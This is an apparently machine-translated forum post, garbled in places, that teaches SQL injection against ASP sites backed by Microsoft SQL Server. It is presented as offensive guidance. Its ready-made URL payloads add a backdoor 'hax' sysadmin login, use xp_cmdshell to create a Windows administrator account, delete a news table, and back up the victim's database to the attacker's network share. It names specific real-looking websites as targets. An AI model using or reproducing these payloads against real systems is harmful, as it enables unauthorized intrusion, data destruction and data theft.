I've only recently discovered that there are so many holes in my program.

The program is posted, unable to remember the source address.

Cheng's book, the source code examples have this flaw exists, in fact, just some legitimate ASP request for SQL, leaving endless!

This attack method originated from the vulnerability of ' or ' 1 ' = ' 1 (we call it a vulnerability), the principle of this loophole I think we all know, then the attendant is; exec

sp_addlogin Hax (Add a Hax user to the database), but this method is very restrictive, first the ASP uses the SQL Server account is an administrator, the second request of the submitted change

At the end of the entire SQL statement, because some programmers use the SELECT * from News WHERE id= ... and topic= ... And .....

This method requests the database, so if you use the example above you will

News.asp?id=2;exec sp_addlogin Hax

becomes a SELECT * from news WHERE id=2;exec sp_addlogin Hax and topic= ... And ...

The entire SQL statement after executing the sp_addlogin stored procedure has and and the judgment existence, the syntax is wrong, your sp_addlogin natural also cannot run normally, therefore try the following method

News.asp?id=2;exec sp_addlogin hax;--

Later--the symbol of the sp_addlogin after the judgment statement into a comment, so there will be no grammatical errors, sp_addlogin normal execution!

Then let's use it together.

News.asp?id=2;exec Master.dbo.sp_addlogin hax;--

News.asp?id=2;exec Master.dbo.sp_password null,hax,hax;--

News.asp?id=2;exec Master.dbo.sp_addsrvrolemember SysAdmin hax;--

News.asp?id=2;exec Master.dbo.xp_cmdshell ' net user Hax hax/workstations:*/times:all/passwordchg:yes/passwordreq: Yes/active:yes/add ';--
News.asp?id=2;exec Master.dbo.xp_cmdshell ' net localgroup Administrators Hax/add ';--

So, you left the Hax administrator account in his database and system.

Of course, the prerequisite is the ASP with the Administrator account, so the virtual space we do not try, there will be no loophole.

Later we will discuss, if the other side of the ASP is not using SQL Administrator account, how we invade, of course, will involve 1433-port intrusion

Of course, we can try to add a ' symbol behind the id=2, mainly look at each other's ASP how to write, and say that when the ASP program uses the SQL account is not the administrator when we do.

You like the letter of the homepage, there are news content, as follows:

http://www.talentit.com.cn/news/news-2.asp?newid=117

We can try Http://www.talentit.com.cn/news/news-2.asp?newid=117;select 123;--

Oh, the report syntax error, select 123 Error, it is obvious that the new ASP in the NEWID variable after the "No."

Then try Http://www.talentit.com.cn/news/news-2.asp?newid=117 ';d elete news;--

Haha, I think as long as the table name is right, the news library has been deleted



Typically, an ASP's SQL account, even if not an administrator, would be owner of a database, at least with a high administrative authority on the library.

But we don't know what the name of the library is. Look at the db_name () function.

Open your Query Analyzer, look at the print db_name (), hehe, the current database name comes out

By analogy, as follows: Declare @a sysname;set @a=db_name (), Backup database @a to disk= ' Your IP your shared directory bak.dat ', name= ' ' Test ';

Oh, his current database is back to your hard drive, the next thing to do in the hearts of everyone understand it

Similarly this method can find each other's SQL IP

First install a firewall, open ICMP and 139TCP and 445TCP warning tips

Then try News.asp?id=2;exec master.dbo.xp_cmdshell ' Ping your IP '

If a firewall prompts someone to ping you, then because you can be sure that the other side of the ASP with the SQL administrator rights, but also determine the exact location of the other's SQL Server, because a lot of large web site to consider performance, it will be the Web services and database separation, when the other side of the big patch can not see the source code , I think this is the only way to quickly locate the location of each other's SQL Server.

Then, if the other ASP does not have SQL administrator rights, we can not call xp_cmdshell, what to do?

Don't worry, try this. News.asp?id=2;declare @a;set @a=db_name (); Backup database @a to disk= ' Your IP your shared directory bak.dat '



, name= ' test ';--

Oh, your firewall should issue a warning, someone connected to your 445 or 139 (Win9 port, so that the other side of the SQL IP can also be exposed so if the other side of the database owner is not the case, we should do? Next time I'm going to tell Big . 蟯 RL wants everyone to submit through VBScript because the browser's address bar will block some special characters so that your command cannot be transmitted completely.

Window.location.herf=url



Add: This question was previously downloaded on the Internet, but only a few simple xp_cmdshell call restrictions are very large, in fact, there are many worthy of in-depth areas such as www.guosen.com.cn. This is the problem with the National credit card, and they use MS's three-tier structure to do the xp_cmdshell, the string will be filtered, but I tried, Heterogeneous requests with SQL can still open the Telnet service and the Administrators group account on each other's machine! Because the firewall is very strict checkpoint datagram access are only open 80 ports Therefore, to get his database structure is more difficult, but there are ways to do: P

By the way, I'd like to draw your attention to the Sqloledb,db_name,openrowset,opendatasource these system functions are useful when ASP's SQL Server account is just an ordinary user!